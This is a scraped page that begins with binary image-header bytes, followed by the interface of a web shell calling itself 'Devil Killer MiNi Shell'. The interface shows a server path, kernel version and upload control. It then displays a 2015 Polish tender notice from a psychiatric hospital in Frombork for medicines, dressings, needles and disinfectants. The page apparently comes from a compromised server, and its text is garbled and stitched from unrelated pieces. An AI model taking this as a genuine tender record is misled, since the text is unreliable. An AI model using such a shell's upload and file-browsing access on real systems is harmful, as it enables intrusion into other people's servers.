JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151030/158327-N-2015.html

<p class="kh_header"><b>Frombork: Dostawa leków, środków opatrunkowych i środków odkażających</b><br>
<b>Numer ogłoszenia: 158327 - 2015; data zamieszczenia: 30.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Specjalistyczny Psychiatryczny Zakład Opieki Zdrowotnej , ul. Sanatoryjna 1, 14-530 Frombork, woj. warmińsko-mazurskie, tel. 55 6216302, faks 55 6216300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-frombork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa leków, środków opatrunkowych i środków odkażających.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został określony w załączniku nr 6 i został podzielony na pakiety, pakiety są niepodzielne:
Pakiet nr I    -  preparaty psychotropowe, ogólne, zewnętrzne i opatrunki
Pakiet nr II  -   specjalistyczne
Pakiet nr III -  sprzęt drobny
Pakiet nr IV -  pampersy, opatrunki
Pakiet nr V  -  zamknięty system próżniowo-aspiracyjny
Pakiet nr VI -  środki antyseptyczne, dezynfekcyjne i odkażające.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 24.45.50.00-8, 33.74.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca załączy do oferty Oryginał oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1-4 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca załączy do oferty Oryginał oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1-4 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca załączy do oferty Oryginał oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1-4 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca załączy do oferty Oryginał oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1-4 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca załączy do oferty Oryginał oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1-4 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - załącznik nr 1 do SIWZ
2. Wypełniony załącznik nr 6 ( dotyczy oferowanych pakietów)
3. Pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów
rejestracyjnych) w przypadku podpisywania oferty przez osoby przez osoby nie wpisane do dokumentów rejestracyjnych.
4. Oświadczenie Wykonawcy, że zapoznał się z warunkami przetargu zawartymi w
Specyfikacji Istotnych Warunków Zamówienia w tym z kryteriami oceny ofert oraz
załącznikami do SIWZ oraz że przyjmuje je bez zastrzeżeń (załącznik nr 1 pkt. 4}.
5. Oświadczenie Wykonawcy, że w przypadku wybrania jego oferty zobowiązuje się do podpisania umowy stanowiącej (załącznik nr 1 pkt. 6} do SIWZ oraz zgodnie z treścią oferty.
6 - zezwolenie na prowadzenie działalności gospodarczej w zakresie prowadzenia hurtowni farmaceutycznej lub zezwolenie na wytwarzanie (producenci) wydane przez Głównego Inspektora Farmaceutycznego zgodnie z ustawą Prawo Farmaceutyczne z dnia 06.09.2001r. (tekst jednolity Dz.U. z 2004r. nr 53 poz. 533 z póź.zm.),
7 - oświadczenie o posiadaniu pozwolenia na dopuszczenie do obrotu produktów leczniczych zgodnie z z Ustawą Prawo Farmaceutyczne z dnia 06.09.2001r.(tekst jednolity Dz.U. z 2004r. nr 53 poz. 533 z póź.zm.), dotyczy to leków oferowanych w przetargu, jednocześnie zobowiązują się w razie potrzeby dostarczyć pozwolenie dopuszczenia dla konkretnego leku, sprzętu,  deklarację zgodności CE na sprzęt { załącznik nr 4 ).
      8 - zezwolenie na obrót lekami psychotropowymi ( dotyczy to tylko pakietu leków  
            psychotropowych 
9 - dotyczy pakietu VI  oferent musi załączyć do oferty: 
	a) karty charakterystyki każdego środka wraz ze sposobem przygotowania roztworu 	  	    roboczego (jeśli dotyczy koncentratów).
	b) oświadczenie o posiadaniu dokumentacji spełniającej wymogi określone w pkt. 3.6  podpkt.c, jednocześnie zobowiązuje się ją dostarczyć na życzenie zamawiającego  załącznik nr 4 . 
10. Wykaz wszystkich dokumentów - spis zawartości złożonej oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - czas dostawy CITO    dla pakietów I i II  lub czas dostawy dla pakietów III; IV; V; VI - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Odbiorca dopuszcza możliwość zmiany umowy w części dotyczącej cen towarów :
        a)  zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto,  cena netto pozostanie bez zmian;
        b)  zmiany cen urzędowych leków, wprowadzonych rozporządzeniem odpowiedniego    Ministra, przy czym zmiany te mogą dotyczyć podwyższenia i obniżenia cen jak również dodania nowych leków a także skreślenia leków z wykazu leków objętych cenami urzędowymi;
        c) zmian stawek opłat celnych wprowadzonych decyzjami odnośnych władz.
Wzór umowy sprzedaży stanowi załącznik nr 5 do niniejszej Specyfikacji Istotnych
Warunków Zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-frombork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Specjalistyczny Psychiatryczny Zakład Opieki Zdrowotnej we Fromborku    14-530  Frombork  ul. Sanatoryjna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.11.2015 godzina 13:00, miejsce: Sekretariacie Samodzielnego Publicznego Specjalistycznego Psychiatrycznego Zakładu Opieki Zdrowotnej we Fromborku ul. Sanatoryjna 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> preparaty psychotropowe, ogólne, zewnętrzne i opatrunki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis asortymentu oraz ilości zostały opisane w załączniku nr 6 do SIWZ  pakiet nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dostawy na CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Risperidonum	RISPOLET CONSTA 	inj	25mg	1zest	50
2.	Risperidonum	RISPOLET CONSTA 	inj	37,5 mg	1zest	30
3.	Risperidonum	RISPOLET CONSTA 	inj	50mg	1zest	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dostawy na CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sprzęt drobny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CEWNIK do odsysania górnych dróg oddechowych	16 18	1szt	20
Cewnik do tlenu		1szt	40
CEWNIK FOLEYA	18	1szt	30
CEWNIK FOLEYA	20	1szt	30
CIŚNIENIOMERZ MECHANICZY ZE SŁUCHAWKAMI		1szt	15
IGŁA	0,5	100szt	5
IGŁA	0,6	100szt	10
IGŁA	0,7	100szt	50
IGŁA	0,8	100szt	70
IGŁA	0,9	100szt	50
KIELISZEK NA LEKI SZKLANY		1szt	100
KIELISZEK NA LEKI TWORZYWO		1szt	1 000
Korki do venflonów		1szt	1 500
Maseczka tlenowa		1szt	30
POJEMNIK NA MOCZ	100-120ml	1szt	2 500
POJEMNIK NA ZUŻYTE IGŁY	500 700ml	1szt	400
POJEMNIK NA ZUŻYTE IGŁY	1000ml	1szt	200
PRZYRZĄD DO PRZETACZANIA Z ŁĄCZNIKIEM		1szt	4 000
RĘKAWICE LATEKSOWE	jałowe	para	20
Rękawice nitrylowe, bezpudrowe           rozmiar: S, M, L
 wytrzymałość
 długość całkowita rękawicy min. 300 mm
 przyleganie mankietu do przedramienia              	M,S,L	100szt opakowannie	200
Rękawice zabiegowe, lateksowe, pudrowane                             rozmiar: S, M, L
 wytrzymałość
 elastyczność  w tym: chwytność i czucie 
 mała ilość środka pudrującego
 brak wywoływania podrażnień 	S,M,L	100szt opakowannie	600
Rękawice zabiegowe, winylowe                             rozmiar: S, M, L,
- wytrzymałość
- elastyczność  w tym: chwytność i czucie 
- mała ilość środka pudrującego
- brak wywoływania podrażnień 	S,M,L	100szt opakowannie	200
Rurka ustno gardłowa 	dla dorosłych	1szt	10
STRZYKAWKA	5ml	1szt	5 000
STRZYKAWKA	10ml	1szt	5 000
STRZYKAWKA	2ml	1szt	3 000
STRZYKAWKA	20ml	1szt	500
SZPATUŁKI LARYNGOLOGICZNE	dla dorosłych	100szt	10
TERMOMETR LEKARSKI		1szt	30
Kaniula VENFLON bezpieczna, z zabezpieczeniem przed ponownym użyciem	22G,23G,24G	1szt	1 000
WORKI NA MOCZ	2l	1szt	40
ZESTAW DO CEWNIKOWANIA		1szt	100
ZESTAW DO USUWANIA SZWÓW		1szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pampersy, opatrunki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GAZA OPATRUNKOWA JAŁOWA	1/2m kw	1 szt	50
GAZA OPATRUNKOWA JAŁOWA	1m kw	1szt	50
KOMPRESY JAŁOWE	9/9 cm 	3szt= 1op	1 000
KOMPRESY JAŁOWE	5/5 cm	3 szt=1op 	1 200
KOMPRESY NIEJAŁOWE	9/9 cm 	100szt/op	10
KOMPRESY NIEJAŁOWE	5/5 cm 	100szt/op	100
LIGNINA ARKUSZE	5kg	5kg	30
OPASKA DZIANA PODTRZYMUJĄCA	4m*10 cm	 1szt	2 500
OPASKA ELASTYCZNA , Z ZAPINKĄ	5m*12 cm	 1szt	100
WATA OPATRUNKOWA	500 g	 1szt	50
PIELICHOMAJTKI DLA DOROSŁYCH ROZM XL	XL	30szt	70
PIELICHOMAJTKI DLA DOROSŁYCH ROZM L	L	30szt	70
PIELICHOMAJTKI DLA DOROSŁYCH ROZM M	M	30szt	70
Plaster bez opatrunku, włóknina	5 m*25 mm	1szt	400
Plaster z opatrunkiem tkanina	1 m*8 cm	1szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zamknięty system próżniowo-aspiracyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> STRZYKAWKO-PROBÓWKA NA SUROWICĘ	OBJĘTOŚĆ  6,5-8,0 ml	3 000
STRZYKAWKO-PROBÓWKA NA MORFOLOGIĘ	OBJĘTOŚĆ 2-3 ml z antykoagulantem EDTA K	3 000
STRZYKAWKO-PROBÓWKA DO OB., nie wymagająca kalibrowanej pipety.	OBJĘTOŚĆ 2-4,0 ml z antykoagulantem cytrynianem sodu	200
IGŁA systemowa z zabezpieczeniem przed ponowymu użyciem -  do strzykawko-probówek	ODPOWIEDNIK IGŁY 0,8	4 000
Statyw do OB. - kompatybilny ze strzykawko-probówkami do OB.	co najmniej 10 stanowisk	1
STAZA UCISKOWA DO POBIERANIA KRWI z zapinką	dla dorosłych	10
LANCETY DO NAKŁUWANIA OPUSZKI PALCA	dla dorosłych	2 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> środki aseptyczne, dezynfekcyjne i odkażające.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Alkoholowy preparat do higienicznej i chirurgicznej dezynfekcji rąk 33631600-8	np.Desderman Pure lub równoważny	80	l	5 l
a  czas dezynfekcji higienicznej 30 sekund, chirurgicznej 1,5 minuty,					
b  oparty o min. trzy substancje aktywne np.  etanol, izopropanol i inną substancję aktywną difenylol lub kwas mlekowy; 					
